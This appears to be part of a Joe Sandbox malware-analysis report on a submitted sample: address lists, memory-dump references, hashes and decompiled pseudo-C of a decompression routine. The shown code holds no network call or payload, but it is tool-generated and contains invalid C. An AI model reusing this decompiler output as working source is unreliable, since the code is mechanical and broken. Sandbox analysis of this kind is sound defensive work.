                                                  0x004067e7
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f4
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f6
                                                  0x004067f9
                                                  0x004067fc
                                                  0x00000000
                                                  0x00000000
                                                  0x004063cc
                                                  0x004063cc
                                                  0x004063d0
                                                  0x00406b3d
                                                  0x00000000
                                                  0x00406b3d
                                                  0x004063d6
                                                  0x004063d9
                                                  0x004063dc
                                                  0x004063e0
                                                  0x004063e3
                                                  0x004063e9
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063eb
                                                  0x004063ee
                                                  0x004063f1
                                                  0x004063f1
                                                  0x004063f4
                                                  0x004063f7
                                                  0x00000000
                                                  0x00000000
                                                  0x004063fd
                                                  0x00406403
                                                  0x00000000
                                                  0x00000000
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640d
                                                  0x00406410
                                                  0x00406413
                                                  0x00406416
                                                  0x00406419
                                                  0x0040641a
                                                  0x0040641d
                                                  0x0040641f
                                                  0x00406425
                                                  0x00406428
                                                  0x0040642b
                                                  0x0040642e
                                                  0x00406431
                                                  0x00406434
                                                  0x00406437
                                                  0x00406453
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645c
                                                  0x00406463
                                                  0x00406467
                                                  0x00406469
                                                  0x0040646d
                                                  0x00406439
                                                  0x00406439
                                                  0x0040643d
                                                  0x00406445
                                                  0x0040644a
                                                  0x0040644c
                                                  0x0040644e
                                                  0x0040644e
                                                  0x00406470
                                                  0x00406477
                                                  0x0040647a
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406480
                                                  0x00000000
                                                  0x00406485
                                                  0x00406485
                                                  0x00406489
                                                  0x00406b49
                                                  0x00000000
                                                  0x00406b49
                                                  0x0040648f
                                                  0x00406492
                                                  0x00406495
                                                  0x00406499
                                                  0x0040649c
                                                  0x004064a2
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a4
                                                  0x004064a7
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064aa
                                                  0x004064b0
                                                  0x00000000
                                                  0x00000000
                                                  0x004064b2
                                                  0x004064b5
                                                  0x004064b8
                                                  0x004064bb
                                                  0x004064be
                                                  0x004064c1
                                                  0x004064c4
                                                  0x004064c7
                                                  0x004064ca
                                                  0x004064cd
                                                  0x004064d0
                                                  0x004064e8
                                                  0x004064eb
                                                  0x004064ee
                                                  0x004064f1
                                                  0x004064f1
                                                  0x004064f4
                                                  0x004064f8
                                                  0x004064fa
                                                  0x004064d2
                                                  0x004064d2
                                                  0x004064da
                                                  0x004064df
                                                  0x004064e1
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064fd
                                                  0x00406504
                                                  0x00406507
                                                  0x00000000
                                                  0x00406509
                                                  0x00000000
                                                  0x00406509
                                                  0x00406507
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x0040650e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406549
                                                  0x00406549
                                                  0x0040654d
                                                  0x00406b55
                                                  0x00000000
                                                  0x00406b55
                                                  0x00406553
                                                  0x00406556
                                                  0x00406559
                                                  0x0040655d
                                                  0x00406560
                                                  0x00406566
                                                  0x00406568
                                                  0x00406568
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406574
                                                  0x00406512
                                                  0x00406512
                                                  0x00406515
                                                  0x00000000
                                                  0x00406515
                                                  0x00406576
                                                  0x00406576
                                                  0x00406579
                                                  0x0040657c
                                                  0x0040657f
                                                  0x00406582
                                                  0x00406585
                                                  0x00406588
                                                  0x0040658b
                                                  0x0040658e
                                                  0x00406591
                                                  0x00406594
                                                  0x004065ac
                                                  0x004065af
                                                  0x004065b2
                                                  0x004065b5
                                                  0x004065b5
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065be
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x004065a3
                                                  0x004065a5
                                                  0x004065a7
                                                  0x004065a7
                                                  0x004065c1
                                                  0x004065c8
                                                  0x004065cb
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x004065cd
                                                  0x00000000
                                                  0x0040685a
                                                  0x0040685a
                                                  0x0040685e
                                                  0x00406b85
                                                  0x00000000
                                                  0x00406b85
                                                  0x00406864
                                                  0x00406867
                                                  0x0040686a
                                                  0x0040686e
                                                  0x00406871
                                                  0x00406877
                                                  0x00406879
                                                  0x00406879
                                                  0x00406879
                                                  0x0040687c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040662a
                                                  0x0040662a
                                                  0x0040662d
                                                  0x0040699f
                                                  0x0040699f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406a2a
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a48
                                                  0x00406a4f
                                                  0x00406a56
                                                  0x00000000
                                                  0x00406a56
                                                  0x00406a2c
                                                  0x00406a2f
                                                  0x00406a32
                                                  0x00406a35
                                                  0x00406a3c
                                                  0x00000000
                                                  0x00000000
                                                  0x00406b17
                                                  0x00406b1a
                                                  0x00406a1b
                                                  0x00406a1b
                                                  0x00000000
                                                  0x00000000
                                                  0x00406751
                                                  0x00406753
                                                  0x0040675a
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00000000
                                                  0x00000000
                                                  0x00406768
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406772
                                                  0x00406772
                                                  0x00406773
                                                  0x00406776
                                                  0x0040677d
                                                  0x00406780
                                                  0x0040678e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406a73
                                                  0x00406a73
                                                  0x00406a77
                                                  0x00406baf
                                                  0x00000000
                                                  0x00406baf
                                                  0x00406a7d
                                                  0x00406a80
                                                  0x00406a83
                                                  0x00406a87
                                                  0x00406a8a
                                                  0x00406a90
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a92
                                                  0x00406a95
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00406a98
                                                  0x00000000
                                                  0x00000000
                                                  0x00406796
                                                  0x00406799
                                                  0x004067cf
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x004068ff
                                                  0x00406902
                                                  0x00406902
                                                  0x00406905
                                                  0x00406907
                                                  0x00406b91
                                                  0x00000000
                                                  0x00406b91
                                                  0x0040690d
                                                  0x00406910
                                                  0x00000000
                                                  0x00000000
                                                  0x00406916
                                                  0x0040691a
                                                  0x0040691d
                                                  0x0040691d
                                                  0x0040691d
                                                  0x00000000
                                                  0x0040691d
                                                  0x0040679b
                                                  0x0040679d
                                                  0x0040679f
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004067a5
                                                  0x004067a7
                                                  0x004067a9
                                                  0x004067ac
                                                  0x004067af
                                                  0x004067c5
                                                  0x004067ca
                                                  0x00406802
                                                  0x00406802
                                                  0x00406806
                                                  0x00406832
                                                  0x00406834
                                                  0x0040683b
                                                  0x0040683e
                                                  0x00406841
                                                  0x00406841
                                                  0x00406846
                                                  0x00406846
                                                  0x00406848
                                                  0x0040684b
                                                  0x00406852
                                                  0x00406855
                                                  0x00406882
                                                  0x00406882
                                                  0x00406885
                                                  0x00406888
                                                  0x004068fc
                                                  0x004068fc
                                                  0x004068fc
                                                  0x00000000
                                                  0x004068fc
                                                  0x0040688a
                                                  0x00406890
                                                  0x00406893
                                                  0x00406896
                                                  0x00406899
                                                  0x0040689c
                                                  0x0040689f
                                                  0x004068a2
                                                  0x004068a5
                                                  0x004068a8
                                                  0x004068ab
                                                  0x004068c4
                                                  0x004068c6
                                                  0x004068c9
                                                  0x004068ca
                                                  0x004068cd
                                                  0x004068cf
                                                  0x004068d2
                                                  0x004068d4
                                                  0x004068d6
                                                  0x004068d9
                                                  0x004068db
                                                  0x004068de
                                                  0x004068e2
                                                  0x004068e4
                                                  0x004068e4
                                                  0x004068e5
                                                  0x004068e8
                                                  0x004068eb
                                                  0x004068ad
                                                  0x004068ad
                                                  0x004068b5
                                                  0x004068ba
                                                  0x004068bc
                                                  0x004068bf
                                                  0x004068bf
                                                  0x004068ee
                                                  0x004068f5
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x0040687f
                                                  0x00000000
                                                  0x004068f7
                                                  0x00000000
                                                  0x004068f7
                                                  0x004068f5
                                                  0x00406808
                                                  0x0040680b
                                                  0x0040680d
                                                  0x00406810
                                                  0x00406813
                                                  0x00406816
                                                  0x00406818
                                                  0x0040681b
                                                  0x0040681e
                                                  0x0040681e
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x0040682b
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x004067ff
                                                  0x00000000
                                                  0x0040682d
                                                  0x00000000
                                                  0x0040682d
                                                  0x0040682b
                                                  0x004067b1
                                                  0x004067b4
                                                  0x004067b6
                                                  0x004067b9
                                                  0x00000000
                                                  0x00000000
                                                  0x00406518
                                                  0x00406518
                                                  0x0040651c
                                                  0x00406b61
                                                  0x00000000
                                                  0x00406b61
                                                  0x00406522
                                                  0x00406525
                                                  0x00406528
                                                  0x0040652b
                                                  0x0040652e
                                                  0x00406531
                                                  0x00406534
                                                  0x00406536
                                                  0x00406539
                                                  0x0040653c
                                                  0x0040653f
                                                  0x00406541
                                                  0x00406541
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x00406b6d
                                                  0x00000000
                                                  0x00406b6d
                                                  0x004066ad
                                                  0x004066b0
                                                  0x004066b3
                                                  0x004066b6
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066b8
                                                  0x004066bb
                                                  0x004066be
                                                  0x004066c1
                                                  0x004066c4
                                                  0x004066c7
                                                  0x004066ca
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066cd
                                                  0x004066d0
                                                  0x004066d3
                                                  0x004066d6
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066d9
                                                  0x004066dc
                                                  0x004066de
                                                  0x004066de
                                                  0x00000000
                                                  0x00000000
                                                  0x00406920
                                                  0x00406920
                                                  0x00406920
                                                  0x00406924
                                                  0x00000000
                                                  0x00000000
                                                  0x0040692a
                                                  0x0040692d
                                                  0x00406930
                                                  0x00406933
                                                  0x00406935
                                                  0x00406935
                                                  0x00406935
                                                  0x00406938
                                                  0x0040693b
                                                  0x0040693e
                                                  0x00406941
                                                  0x00406944
                                                  0x00406947
                                                  0x00406948
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694a
                                                  0x0040694d
                                                  0x00406950
                                                  0x00406953
                                                  0x00406956
                                                  0x00406959
                                                  0x0040695d
                                                  0x0040695f
                                                  0x00406962
                                                  0x00000000
                                                  0x00406964
                                                  0x004066e1
                                                  0x004066e1
                                                  0x00000000
                                                  0x004066e1
                                                  0x00406962
                                                  0x00406b97
                                                  0x00406bb9
                                                  0x00406bbf
                                                  0x00406bc1
                                                  0x00406bc8
                                                  0x00406bca
                                                  0x00406bd1
                                                  0x00406bd5
                                                  0x00000000
                                                  0x004061c6
                                                  0x00406bce
                                                  0x00406bce
                                                  0x00000000
                                                  0x00406bce
                                                  0x00406a1b
                                                  0x00406aa1
                                                  0x00406aa7
                                                  0x00406aaa
                                                  0x00406aad
                                                  0x00406ab0
                                                  0x00406ab3
                                                  0x00406ab6
                                                  0x00406ab9
                                                  0x00406abc
                                                  0x00406ac2
                                                  0x00406adb
                                                  0x00406ade
                                                  0x00406ae1
                                                  0x00406ae4
                                                  0x00406ae8
                                                  0x00406aea
                                                  0x00406aeb
                                                  0x00406aee
                                                  0x00406ac4
                                                  0x00406ac4
                                                  0x00406acc
                                                  0x00406ad1
                                                  0x00406ad3
                                                  0x00406ad6
                                                  0x00406ad6
                                                  0x00406af8
                                                  0x00000000
                                                  0x00406afa
                                                  0x00000000
                                                  0x00406afa
                                                  0x00406af8
                                                  0x00000000
                                                  0x0040696d

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.311843412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.311830550.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311864314.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311880086.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311893353.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311939843.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311957547.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.311975233.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Lc8xQv8iZY.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                                  • Instruction ID: f8b3e10e58f717f8edde5794a38fefd32bea2d44dd320be9cbeb21c60fb05cda
                                                  • Opcode Fuzzy Hash: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                                  • Instruction Fuzzy Hash: F5913270E00229CBDF28DF98C8547ADBBB1FB45305F15816ED816BB281C778AA96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040667F Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E0040667F() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
